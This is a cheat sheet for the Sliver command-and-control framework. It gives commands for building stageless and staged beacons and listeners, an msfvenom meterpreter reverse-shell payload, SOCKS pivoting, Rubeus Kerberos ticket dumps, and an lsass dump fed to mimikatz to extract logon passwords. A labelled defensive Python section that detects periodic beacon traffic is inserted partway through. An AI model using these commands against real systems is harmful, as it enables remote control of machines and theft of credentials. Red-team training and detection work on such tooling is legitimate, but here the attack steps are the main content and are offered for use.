Sliver CheatSheet

 

0.0 Experimental

tishina.in

  • Sliver obfuscation with garble (noted as not so easy to set up)
  • Using mangle for implant obfuscation

1.0 Installation

1.1 One-Liner

curl https://sliver.sh/install | sudo bash

1.2 Alternate Method

su root
wget https://sliver.sh/install
chmod +x install
./install

2.0 Configuration

2.1 Service Check

sudo service sliver start
sudo service sliver status

2.2 First Run

Load updates and plugins.

sliver
sliver> update
sliver> armory install all

3.0 Usage

3.1 Run

Check for updates.

sliver
sliver> update
sliver> armory
sliver> armory update

3.2 Compile a Beacon

3.2.1 Stageless Beacon

generate beacon --http $ip -G --name $beaconname --jitter 5 --seconds 20

3.2.2 Staged Beacon

First, create a profile:

profiles new beacon --arch amd64 --os windows --mtls $ip':443' -f shellcode --timeout 300 --seconds 5 --jitter 1 $profilename

Next, create a stage listener:

stage-listener --url 'http://'$ip':8080' --profile $profilename --prepend-size

Then start another listener, for the stage 2 request:

mtls --lhost $ip --lport 443

Finally, generate the stager:

generate stager -r http --lhost $ip --lport 8080

The generated shellcode can be placed into a dropper, which can then be executed on the target system.
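Beacons built with the settings above check in about every 20 seconds with a few seconds of jitter (`--seconds 20 --jitter 5` in 3.2.1, `--seconds 5 --jitter 1` in the staged profile). From the defender's side that regularity is what to hunt for. The following is an added example, not part of the original cheatsheet or of Sliver: it groups outbound connections from a constructed proxy log by source/destination pair and flags pairs whose inter-connection gaps are tightly clustered. The log format, addresses and thresholds are all constructed assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not real traffic): 10.0.0.5 checks in roughly every
# 20 s with a few seconds of jitter; 10.0.0.7 makes irregular, user-driven
# connections. Addresses are private/documentation ranges.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:00:07Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:00:20Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:00:37Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:01:01Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:01:22Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:01:37Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:02:02Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:02:17Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:02:21Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:02:24Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:02:43Z src=10.0.0.5 dst=203.0.113.10:443
2024-05-01T10:17:24Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:18:09Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:18:12Z src=10.0.0.7 dst=203.0.113.20:443
2024-05-01T10:19:12Z src=10.0.0.7 dst=203.0.113.20:443
"""

def parse_log(text):
    """Group connection timestamps by (src, dst) pair."""
    conns = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst = line.split()
        when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        conns[(src.split("=", 1)[1], dst.split("=", 1)[1])].append(when)
    return conns

def find_beacons(text, min_conns=6, max_cv=0.3, min_gap=5, max_gap=3600):
    """Flag pairs whose gaps between connections are tightly clustered: a low
    coefficient of variation (stdev / mean) is the mark of interval + jitter."""
    findings = {}
    for pair, times in parse_log(text).items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean, median = statistics.mean(gaps), statistics.median(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if min_gap <= median <= max_gap and cv <= max_cv:
            findings[pair] = {"count": len(times), "median_gap": median, "cv": round(cv, 3)}
    return findings
```

Calling `find_beacons(SAMPLE_LOG)` reports only the 10.0.0.5 pair (median gap 20.5 s, CV about 0.17); the irregular host is ignored. Real deployments should tune the thresholds against known-good traffic, since schedulers and update agents also check in periodically.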

3.2.3 Staged (Workaround)

If Sliver can’t generate the stage, try this:

sliver > profiles new beacon --mtls $ip:443 -f shellcode --timeout 300 --seconds 5 --jitter 1 --debug $profilename
sliver > stage-listener --url tcp://$ip:8899 --profile $profilename --prepend-size
sliver > mtls --lhost $ip --lport 443
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=8899 -f exe -o sliver-s1.exe

3.3 Examples

3.3.1 Socks

sliver > socks5 start
sudo nano /etc/proxychains4.conf
>> socks5 127.0.0.1 1081
 
proxychains -q <command>

3.3.2 Kerberos / Rubeus

rubeus triage 
rubeus dump /service:krbtgt /luid:$LUID /nowrap
 
nano file.b64
cat file.b64 | base64 -d > file.kirbi
impacket-ticketConverter file.kirbi file.ccache
export KRB5CCNAME=file.ccache
klist
 
nxc smb EVERGREEN -k --use-kcache

3.3.3 lsass Dump

ps
576    432    NT AUTHORITY\SYSTEM                  x86_64   lsass.exe 
 
procdump -X -p 576
loot
loot fetch --save /file/lsass.dmp
 
# Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
# Extract credentials
mimikatz # sekurlsa::logonPasswords

4.0 Hints

4.1 Useful Commands

execute 
interactive # starts an interactive session
execute-assembly /path/to/cs-tool.exe
rubeus

5.0 References

Kali CheatSheet